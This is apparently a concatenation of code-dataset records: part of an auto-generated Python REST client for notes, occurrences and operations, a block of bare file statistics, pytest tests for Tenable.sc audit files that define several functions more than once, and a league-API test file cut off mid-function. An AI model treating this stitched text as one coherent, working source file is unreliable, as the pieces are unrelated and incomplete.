    # Sync and async paths both reduce to the same delegate call:
    # with async_req set the delegate already returns the thread.
    kwargs['_return_http_data_only'] = True
    return self.update_note_with_http_info(name, body, **kwargs)  # noqa: E501
def update_note_with_http_info(self, name, body, **kwargs):  # noqa: E501
    """Updates an existing `Note`. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_note_with_http_info(name, body, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the note. Should be of the form \"projects/{provider_id}/notes/{note_id}\". (required)
    :param ApiNote body: The updated note. (required)
    :return: ApiNote
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['name', 'body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_note" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `update_note`")  # noqa: E501
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `update_note`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/notes/*}', 'PATCH',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiNote',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_occurrence(self, name, body, **kwargs):  # noqa: E501
    """Updates an existing occurrence.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread instead of the response body.
    >>> thread = api.update_occurrence(name, body, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the occurrence. Should be of the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\". (required)
    :param ApiOccurrence body: The updated occurrence. (required)
    :return: ApiOccurrence
        If the method is called asynchronously,
        returns the request thread.
    """
    # Sync and async paths both reduce to the same delegate call:
    # with async_req set the delegate already returns the thread.
    kwargs['_return_http_data_only'] = True
    return self.update_occurrence_with_http_info(name, body, **kwargs)  # noqa: E501
def update_occurrence_with_http_info(self, name, body, **kwargs):  # noqa: E501
    """Updates an existing occurrence. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_occurrence_with_http_info(name, body, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the occurrence. Should be of the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\". (required)
    :param ApiOccurrence body: The updated occurrence. (required)
    :return: ApiOccurrence
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['name', 'body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_occurrence" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `update_occurrence`")  # noqa: E501
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `update_occurrence`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/occurrences/*}', 'PATCH',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiOccurrence',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_operation(self, name, body, **kwargs):  # noqa: E501
    """Updates an existing operation returns an error if operation does not exist. The only valid operations are to update mark the done bit change the result.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread instead of the response body.
    >>> thread = api.update_operation(name, body, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the Operation. Should be of the form \"projects/{provider_id}/operations/{operation_id}\". (required)
    :param ApiUpdateOperationRequest body: (required)
    :return: GooglelongrunningOperation
        If the method is called asynchronously,
        returns the request thread.
    """
    # Sync and async paths both reduce to the same delegate call:
    # with async_req set the delegate already returns the thread.
    kwargs['_return_http_data_only'] = True
    return self.update_operation_with_http_info(name, body, **kwargs)  # noqa: E501
def update_operation_with_http_info(self, name, body, **kwargs):  # noqa: E501
    """Updates an existing operation returns an error if operation does not exist. The only valid operations are to update mark the done bit change the result. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_operation_with_http_info(name, body, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the Operation. Should be of the form \"projects/{provider_id}/operations/{operation_id}\". (required)
    :param ApiUpdateOperationRequest body: (required)
    :return: GooglelongrunningOperation
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['name', 'body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_operation" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `update_operation`")  # noqa: E501
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `update_operation`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/operations/*}', 'PATCH',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GooglelongrunningOperation',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 41.226134
| 178
| 0.608464
| 7,022
| 60,891
| 5.062091
| 0.032612
| 0.047713
| 0.022056
| 0.028358
| 0.981067
| 0.979716
| 0.978282
| 0.974962
| 0.973105
| 0.971474
| 0
| 0.015672
| 0.295807
| 60,891
| 1,476
| 179
| 41.254065
| 0.813312
| 0.348869
| 0
| 0.838868
| 1
| 0
| 0.190011
| 0.045034
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03567
| false
| 0
| 0.00492
| 0
| 0.093481
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ca8c7da4b34d4a9566857faa1271d5b2fb84dfa2
| 18,803
|
py
|
Python
|
tests/sc/test_audit_files.py
|
39biradar/pyTenable
|
a055140bc864bb950fd1053ab598ff2da12cf408
|
[
"MIT"
] | null | null | null |
tests/sc/test_audit_files.py
|
39biradar/pyTenable
|
a055140bc864bb950fd1053ab598ff2da12cf408
|
[
"MIT"
] | null | null | null |
tests/sc/test_audit_files.py
|
39biradar/pyTenable
|
a055140bc864bb950fd1053ab598ff2da12cf408
|
[
"MIT"
] | null | null | null |
import os
import pytest
from ..checker import check
from tenable.errors import APIError, UnexpectedValueError
from tests.pytenable_log_handler import log_exception
def test_audit_files_constructor_name_typeerror(sc, vcr):
    """A non-string name must raise TypeError in _constructor, create and edit."""
    with pytest.raises(TypeError):
        sc.audit_files._constructor(name=1)
    # (scratch file, file-keyword, extra positional args) for each API call;
    # an empty args tuple selects create(), (1,) selects edit(1, ...).
    scenarios = [
        ('audit-file.xml', 'audit_file', ()),
        ('tailoring-file.xml', 'tailoring_file', ()),
        ('audit-file.xml', 'audit_file', (1,)),
        ('tailoring-file.xml', 'tailoring_file', (1,)),
    ]
    for filename, file_kwarg, extra_args in scenarios:
        method = sc.audit_files.edit if extra_args else sc.audit_files.create
        with vcr.use_cassette('test_files_upload_clear_success'):
            with open(filename, 'w+') as handle:
                with pytest.raises(TypeError):
                    method(*extra_args, name=1, **{file_kwarg: handle})
        os.remove(filename)
def test_audit_files_constructor_description_typeerror(sc):
    """A non-string description is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, description=1)
def test_audit_files_constructor_type_typeerror(sc):
    """A non-string type is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, type=1)
def test_audit_files_constructor_type_unexpectedvalueerror(sc):
    """An unknown type string is rejected."""
    pytest.raises(UnexpectedValueError, sc.audit_files._constructor,
                  type='something else')
def test_audit_files_constructor_template_typeerror(sc):
    """A non-integer template id is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, template='one')
def test_audit_files_constructor_vars_typeerror(sc):
    """vars must be a dict."""
    pytest.raises(TypeError, sc.audit_files._constructor, vars='one')
def test_audit_files_constructor_vars_key_typeerror(sc):
    """vars keys must be strings."""
    pytest.raises(TypeError, sc.audit_files._constructor, vars={1: 'one'})
def test_audit_files_constructor_vars_value_typeerror(sc):
    """vars values must be strings."""
    pytest.raises(TypeError, sc.audit_files._constructor, vars={'one': 1})
def test_audit_files_constructor_filename_typeerror(sc):
    """A non-string filename is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, filename=1)
def test_audit_files_constructor_orig_filename_typeerror(sc):
    """A non-string original filename is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, orig_filename=1)
def test_audit_files_constructor_version_typeerror(sc):
    """A non-string version is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, version=1)
def test_audit_files_constructor_version_unexpectedvalueerror(sc):
    """An unsupported version string is rejected."""
    pytest.raises(UnexpectedValueError, sc.audit_files._constructor,
                  version='0.9')
def test_audit_files_constructor_benchmark_typeerror(sc):
    """A non-string benchmark name is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, benchmark=1)
def test_audit_files_constructor_profile_typeerror(sc):
    """A non-string profile name is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, profile=1)
def test_audit_files_constructor_data_stream_typeerror(sc):
    """A non-string data stream name is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, data_stream=1)
def test_audit_files_constructor_tailoring_filename_typeerror(sc):
    """A non-string tailoring filename is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor, tailoring_filename=1)
def test_audit_files_constructor_tailoring_orig_filename_typeerror(sc):
    """A non-string tailoring original filename is rejected."""
    pytest.raises(TypeError, sc.audit_files._constructor,
                  tailoring_orig_filename=1)
def test_audit_files_constructor_success(sc):
    """A fully-populated _constructor call maps every keyword onto the
    corresponding API document field."""
    kwargs = dict(
        name='name',
        description='description',
        type='',
        template=1,
        vars={'example': 'one'},
        filename='test.audit',
        orig_filename='orig.audit',
        version='1.0',
        benchmark='benchmark',
        profile='profile',
        data_stream='datastream',
        tailoring_filename='tf.audit',
        tailoring_orig_filename='orig-tf.audit',
    )
    expected = {
        'name': 'name',
        'description': 'description',
        'filename': 'test.audit',
        'originalFilename': 'orig.audit',
        'version': '1.0',
        'benchmarkName': 'benchmark',
        'profileName': 'profile',
        'dataStreamName': 'datastream',
        'tailoringFilename': 'tf.audit',
        'tailoringOriginalFilename': 'orig-tf.audit',
        'variables': [{'name': 'example', 'value': 'one'}],
        'auditFileTemplate': {'id': 1},
        'type': '',
    }
    assert sc.audit_files._constructor(**kwargs) == expected
@pytest.fixture
def audit_file(request, sc, vcr):
    """Create a throwaway audit file for a test and delete it afterwards.

    The create and delete calls are replayed from separate VCR cassettes.
    Deletion failures are logged rather than raised so that teardown never
    masks the actual test result.
    """
    with vcr.use_cassette('test_audit_files_create_success'):
        audit_file = sc.audit_files.create('Example',
            template=162,
            vars={
                'BANNER_TEXT': '',
                'NTP_SERVER_1': '4.2.2.2',
                'NTP_SERVER_2': '192.168.0.1',
                'NTP_SERVER_3': '192.168.0.1',
                'INTERNAL_NETWORK': '192.168.',
                'HOSTS_ALLOW_NETWORK': '192.168.',
                'LOG_SERVER': '192.168.0.1',
            })
    def teardown():
        # Best-effort cleanup: a failed delete is logged, not raised.
        try:
            with vcr.use_cassette('test_audit_files_delete_success'):
                sc.audit_files.delete(int(audit_file['id']))
        except APIError as error:
            log_exception(error)
    request.addfinalizer(teardown)
    return audit_file
def test_audit_files_create_success(sc, audit_file):
    """The created audit-file document exposes every expected field with
    the expected type."""
    assert isinstance(audit_file, dict)
    # (path, expected type) pairs, in the original assertion order.  A
    # one-element path checks the top-level document; a two-element path
    # checks a key inside the named sub-document.
    expectations = [
        (('auditFileTemplate',), dict), (('auditFileTemplate', 'id'), str),
        (('auditFileTemplate', 'name'), str),
        (('auditFileTemplate', 'categoryName'), str),
        (('canManage',), str), (('canUse',), str), (('context',), str),
        (('createdTime',), str), (('creator',), dict),
        (('creator', 'id'), str), (('creator', 'username'), str),
        (('creator', 'firstname'), str), (('creator', 'lastname'), str),
        (('description',), str), (('editor',), str), (('filename',), str),
        (('groups',), list), (('id',), str), (('lastRefreshedTime',), str),
        (('modifiedTime',), str), (('name',), str),
        (('originalFilename',), str), (('owner',), dict),
        (('owner', 'id'), str), (('owner', 'username'), str),
        (('owner', 'firstname'), str), (('owner', 'lastname'), str),
        (('ownerGroup',), dict), (('ownerGroup', 'id'), str),
        (('ownerGroup', 'name'), str), (('ownerGroup', 'description'), str),
        (('status',), str), (('targetGroup',), dict),
        (('targetGroup', 'id'), int), (('targetGroup', 'name'), str),
        (('targetGroup', 'description'), str), (('type',), str),
        (('typeFields',), dict), (('typeFields', 'variables'), list),
    ]
    for path, expected_type in expectations:
        container = audit_file if len(path) == 1 else audit_file[path[0]]
        check(container, path[-1], expected_type)
    for variable in audit_file['typeFields']['variables']:
        check(variable, 'name', str)
        check(variable, 'value', str)
    check(audit_file, 'version', str)
@pytest.mark.vcr()
def test_audit_files_delete_success(sc, audit_file):
    """Deleting an existing audit file by its numeric id succeeds."""
    file_id = int(audit_file['id'])
    sc.audit_files.delete(file_id)
@pytest.mark.vcr()
def test_audit_files_edit_success(sc, audit_file):
    """Editing an audit file's name returns the full, well-typed document."""
    edited = sc.audit_files.edit(int(audit_file['id']), name='updates name')
    assert isinstance(edited, dict)
    # (path, expected type) pairs, in the original assertion order.  A
    # one-element path checks the top-level document; a two-element path
    # checks a key inside the named sub-document.
    expectations = [
        (('auditFileTemplate',), dict), (('auditFileTemplate', 'id'), str),
        (('auditFileTemplate', 'name'), str),
        (('auditFileTemplate', 'categoryName'), str),
        (('canManage',), str), (('canUse',), str), (('context',), str),
        (('createdTime',), str), (('creator',), dict),
        (('creator', 'id'), str), (('creator', 'username'), str),
        (('creator', 'firstname'), str), (('creator', 'lastname'), str),
        (('description',), str), (('editor',), str), (('filename',), str),
        (('groups',), list), (('id',), str), (('lastRefreshedTime',), str),
        (('modifiedTime',), str), (('name',), str),
        (('originalFilename',), str), (('owner',), dict),
        (('owner', 'id'), str), (('owner', 'username'), str),
        (('owner', 'firstname'), str), (('owner', 'lastname'), str),
        (('ownerGroup',), dict), (('ownerGroup', 'id'), str),
        (('ownerGroup', 'name'), str), (('ownerGroup', 'description'), str),
        (('status',), str), (('targetGroup',), dict),
        (('targetGroup', 'id'), int), (('targetGroup', 'name'), str),
        (('targetGroup', 'description'), str), (('type',), str),
        (('typeFields',), dict), (('typeFields', 'variables'), list),
    ]
    for path, expected_type in expectations:
        container = edited if len(path) == 1 else edited[path[0]]
        check(container, path[-1], expected_type)
    for variable in edited['typeFields']['variables']:
        check(variable, 'name', str)
        check(variable, 'value', str)
    check(edited, 'version', str)
@pytest.mark.vcr()
def test_audit_files_details_success_for_fields(sc, audit_file):
    """Requesting a restricted field set returns those fields as strings."""
    wanted = ['id', 'name', 'description']
    details = sc.audit_files.details(int(audit_file['id']), fields=wanted)
    assert isinstance(details, dict)
    for field in wanted:
        check(details, field, str)
@pytest.mark.vcr()
def test_audit_files_details_success(sc, audit_file):
    """Unrestricted details() returns the full, well-typed document."""
    details = sc.audit_files.details(int(audit_file['id']))
    assert isinstance(details, dict)
    # (path, expected type) pairs, in the original assertion order.  A
    # one-element path checks the top-level document; a two-element path
    # checks a key inside the named sub-document.
    expectations = [
        (('auditFileTemplate',), dict), (('auditFileTemplate', 'id'), str),
        (('auditFileTemplate', 'name'), str),
        (('auditFileTemplate', 'categoryName'), str),
        (('canManage',), str), (('canUse',), str), (('context',), str),
        (('createdTime',), str), (('creator',), dict),
        (('creator', 'id'), str), (('creator', 'username'), str),
        (('creator', 'firstname'), str), (('creator', 'lastname'), str),
        (('description',), str), (('editor',), str), (('filename',), str),
        (('groups',), list), (('id',), str), (('lastRefreshedTime',), str),
        (('modifiedTime',), str), (('name',), str),
        (('originalFilename',), str), (('owner',), dict),
        (('owner', 'id'), str), (('owner', 'username'), str),
        (('owner', 'firstname'), str), (('owner', 'lastname'), str),
        (('ownerGroup',), dict), (('ownerGroup', 'id'), str),
        (('ownerGroup', 'name'), str), (('ownerGroup', 'description'), str),
        (('status',), str), (('targetGroup',), dict),
        (('targetGroup', 'id'), int), (('targetGroup', 'name'), str),
        (('targetGroup', 'description'), str), (('type',), str),
        (('typeFields',), dict), (('typeFields', 'variables'), list),
    ]
    for path, expected_type in expectations:
        container = details if len(path) == 1 else details[path[0]]
        check(container, path[-1], expected_type)
    for variable in details['typeFields']['variables']:
        check(variable, 'name', str)
        check(variable, 'value', str)
    check(details, 'version', str)
@pytest.mark.vcr()
def test_audit_files_list_success(sc):
    """list() returns 'usable' and 'manageable' buckets of summaries.

    Every entry in both buckets carries the string summary fields the API
    documents for an audit file.
    """
    a_files = sc.audit_files.list()
    assert isinstance(a_files, dict)
    for bucket in ['usable', 'manageable']:
        # renamed from 'type', which shadowed the builtin
        for entry in a_files[bucket]:
            check(entry, 'name', str)
            check(entry, 'description', str)
            check(entry, 'type', str)
            check(entry, 'status', str)
            check(entry, 'id', str)
@pytest.mark.vcr()
def test_audit_files_list_success_for_fields(sc):
    """list() restricted to a field tuple returns only those fields.

    NOTE(review): this function is re-defined twice further down the
    module; pytest only collects the final binding of the name, so this
    copy is effectively dead code.
    """
    audit_files = sc.audit_files.list(fields=('id', 'name', 'description'))
    assert isinstance(audit_files, dict)
    for c in ['usable', 'manageable']:
        for a in audit_files[c]:
            check(a, 'name', str)
            check(a, 'description', str)
            check(a, 'id', str)
@pytest.mark.vcr()
def test_audit_files_export_audit(sc):
    """Exporting an audit file into a caller-provided file object succeeds."""
    target = '1000007.xml'
    with open(target, 'wb') as fobj:
        sc.audit_files.export_audit(1000007, fobj=fobj)
    os.remove(target)
@pytest.mark.vcr()
def test_audit_files_export_audit_no_file(sc):
    """export_audit completes without an explicit target file object.

    NOTE(review): the opened handle is never passed to the API call —
    presumably the open() only guarantees '1000007.xml' exists for the
    os.remove below; confirm whether it is actually needed.
    """
    with open('1000007.xml', 'wb'):
        sc.audit_files.export_audit(1000007)
    os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_template_details_success(sc):
    """template_details() returns each requested template field as a string."""
    wanted = ['id', 'name', 'categoryName', 'categoryId']
    template = sc.audit_files.template_details(1, fields=wanted)
    assert isinstance(template, dict)
    for field in wanted:
        check(template, field, str)
@pytest.mark.vcr()
def test_audit_files_template_list_success(sc):
    """A filtered template_list() query returns well-typed template rows."""
    wanted = ['id', 'name', 'categoryName', 'categoryId']
    templates = sc.audit_files.template_list(fields=wanted,
                                             category=1,
                                             search='categoryName:Unix')
    assert isinstance(templates, list)
    for template in templates:
        for field in wanted:
            check(template, field, str)
@pytest.mark.vcr()
def test_audit_files_template_categories(sc):
    """Every template category exposes a string name and id."""
    categories = sc.audit_files.template_categories()
    assert isinstance(categories, list)
    for cat in categories:
        check(cat, 'categoryName', str)
        check(cat, 'categoryId', str)
# NOTE(review): everything from here to the end of the module re-defines,
# twice over, test functions that already exist above
# (list_success_for_fields, export_audit, export_audit_no_file,
# template_details_success, template_list_success, template_categories).
# Python keeps only the last binding of each name, so the earlier copies
# are never collected by pytest; the duplicates should be deleted.
@pytest.mark.vcr()
def test_audit_files_list_success_for_fields(sc):
    audit_files = sc.audit_files.list(fields=('id', 'name', 'description'))
    assert isinstance(audit_files, dict)
    for c in ['usable', 'manageable']:
        for a in audit_files[c]:
            check(a, 'name', str)
            check(a, 'description', str)
            check(a, 'id', str)
@pytest.mark.vcr()
def test_audit_files_export_audit(sc):
    with open('1000007.xml', 'wb') as file:
        sc.audit_files.export_audit(1000007, fobj=file)
    os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_export_audit_no_file(sc):
    with open('1000007.xml', 'wb'):
        sc.audit_files.export_audit(1000007)
    os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_template_details_success(sc):
    template = sc.audit_files.template_details(1,
                                               fields=['id', 'name', 'categoryName', 'categoryId'])
    assert isinstance(template, dict)
    check(template, 'id', str)
    check(template, 'name', str)
    check(template, 'categoryName', str)
    check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_list_success(sc):
    templates = sc.audit_files.template_list(fields=['id', 'name', 'categoryName', 'categoryId'],
                                             category=1,
                                             search='categoryName:Unix')
    assert isinstance(templates, list)
    for template in templates:
        check(template, 'id', str)
        check(template, 'name', str)
        check(template, 'categoryName', str)
        check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_categories(sc):
    categories = sc.audit_files.template_categories()
    assert isinstance(categories, list)
    for category in categories:
        check(category, 'categoryName', str)
        check(category, 'categoryId', str)
# NOTE(review): second duplicate copy of the same six tests; these are the
# bindings pytest actually collects.
@pytest.mark.vcr()
def test_audit_files_list_success_for_fields(sc):
    audit_files = sc.audit_files.list(fields=('id', 'name', 'description'))
    assert isinstance(audit_files, dict)
    for c in ['usable', 'manageable']:
        for a in audit_files[c]:
            check(a, 'name', str)
            check(a, 'description', str)
            check(a, 'id', str)
@pytest.mark.vcr()
def test_audit_files_export_audit(sc):
    with open('1000007.xml', 'wb') as file:
        sc.audit_files.export_audit(1000007, fobj=file)
    os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_export_audit_no_file(sc):
    with open('1000007.xml', 'wb'):
        sc.audit_files.export_audit(1000007)
    os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_template_details_success(sc):
    template = sc.audit_files.template_details(1,
                                               fields=['id', 'name', 'categoryName', 'categoryId'])
    assert isinstance(template, dict)
    check(template, 'id', str)
    check(template, 'name', str)
    check(template, 'categoryName', str)
    check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_list_success(sc):
    templates = sc.audit_files.template_list(fields=['id', 'name', 'categoryName', 'categoryId'],
                                             category=1,
                                             search='categoryName:Unix')
    assert isinstance(templates, list)
    for template in templates:
        check(template, 'id', str)
        check(template, 'name', str)
        check(template, 'categoryName', str)
        check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_categories(sc):
    categories = sc.audit_files.template_categories()
    assert isinstance(categories, list)
    for category in categories:
        check(category, 'categoryName', str)
        check(category, 'categoryId', str)
| 36.299228
| 100
| 0.653566
| 2,259
| 18,803
| 5.213811
| 0.062417
| 0.116149
| 0.146205
| 0.13712
| 0.898625
| 0.871795
| 0.863474
| 0.822551
| 0.802258
| 0.795551
| 0
| 0.013757
| 0.207467
| 18,803
| 517
| 101
| 36.369439
| 0.776607
| 0
| 0
| 0.736597
| 0
| 0
| 0.171781
| 0.011222
| 0
| 0
| 0
| 0
| 0.041958
| 1
| 0.102564
| false
| 0
| 0.011655
| 0
| 0.11655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
049f72425e50d469aed857ba2155ea2bcd0d4188
| 4,385
|
py
|
Python
|
test/test_league.py
|
dp0973/pantheon
|
89ac57717ed3cf6532986069b6c94228be273b8b
|
[
"MIT"
] | 52
|
2018-04-24T15:30:02.000Z
|
2022-02-22T11:05:27.000Z
|
test/test_league.py
|
dp0973/pantheon
|
89ac57717ed3cf6532986069b6c94228be273b8b
|
[
"MIT"
] | 8
|
2020-09-18T04:00:21.000Z
|
2022-03-22T00:01:20.000Z
|
test/test_league.py
|
dp0973/pantheon
|
89ac57717ed3cf6532986069b6c94228be273b8b
|
[
"MIT"
] | 14
|
2019-01-03T13:09:36.000Z
|
2022-03-05T17:13:45.000Z
|
from .config import *
def test_leagueId():
    """getLeagueById returns the league document for the requested leagueId.

    A transport failure is reported as an explicit test failure; the old
    swallow-and-print pattern left ``data`` unbound and surfaced as a
    confusing NameError on the following line.
    """
    try:
        data = loop.run_until_complete(panth.getLeagueById(leagueId))
    except Exception as error:
        pytest.fail("getLeagueById raised: {}".format(error))
    assert data["leagueId"] == leagueId
    assert isinstance(data["entries"], list)
def _run_league_call(coro):
    """Run *coro* to completion on the shared event loop.

    Fails the test immediately on any exception.  This replaces the old
    ``except Exception: print(e)`` pattern, which left ``data`` unbound
    and surfaced later as a confusing NameError.
    """
    try:
        return loop.run_until_complete(coro)
    except Exception as error:
        pytest.fail("league API call raised: {}".format(error))


def _assert_apex_league(data, tier, queue):
    """Common assertions shared by all apex-league responses."""
    assert data["tier"] == tier
    assert data["queue"] == queue
    assert isinstance(data["entries"], list)


@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_challenger():
    """Challenger league defaults to the solo queue."""
    data = _run_league_call(panth.getChallengerLeague())
    _assert_apex_league(data, "CHALLENGER", "RANKED_SOLO_5x5")


@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_challenger_flex():
    """Challenger league honours an explicit flex-queue argument."""
    data = _run_league_call(panth.getChallengerLeague("RANKED_FLEX_SR"))
    _assert_apex_league(data, "CHALLENGER", "RANKED_FLEX_SR")


@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_grandmaster():
    """Grandmaster league defaults to the solo queue."""
    data = _run_league_call(panth.getGrandmasterLeague())
    _assert_apex_league(data, "GRANDMASTER", "RANKED_SOLO_5x5")


@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_grandmaster_flex():
    """Grandmaster league honours an explicit flex-queue argument."""
    data = _run_league_call(panth.getGrandmasterLeague("RANKED_FLEX_SR"))
    _assert_apex_league(data, "GRANDMASTER", "RANKED_FLEX_SR")


@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_master():
    """Master league defaults to the solo queue."""
    data = _run_league_call(panth.getMasterLeague())
    _assert_apex_league(data, "MASTER", "RANKED_SOLO_5x5")


@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_master_flex():
    """Master league honours an explicit flex-queue argument."""
    data = _run_league_call(panth.getMasterLeague("RANKED_FLEX_SR"))
    _assert_apex_league(data, "MASTER", "RANKED_FLEX_SR")
def test_league_entries_by_summonerId():
    """getLeaguePosition returns a list of league entries for a summoner."""
    try:
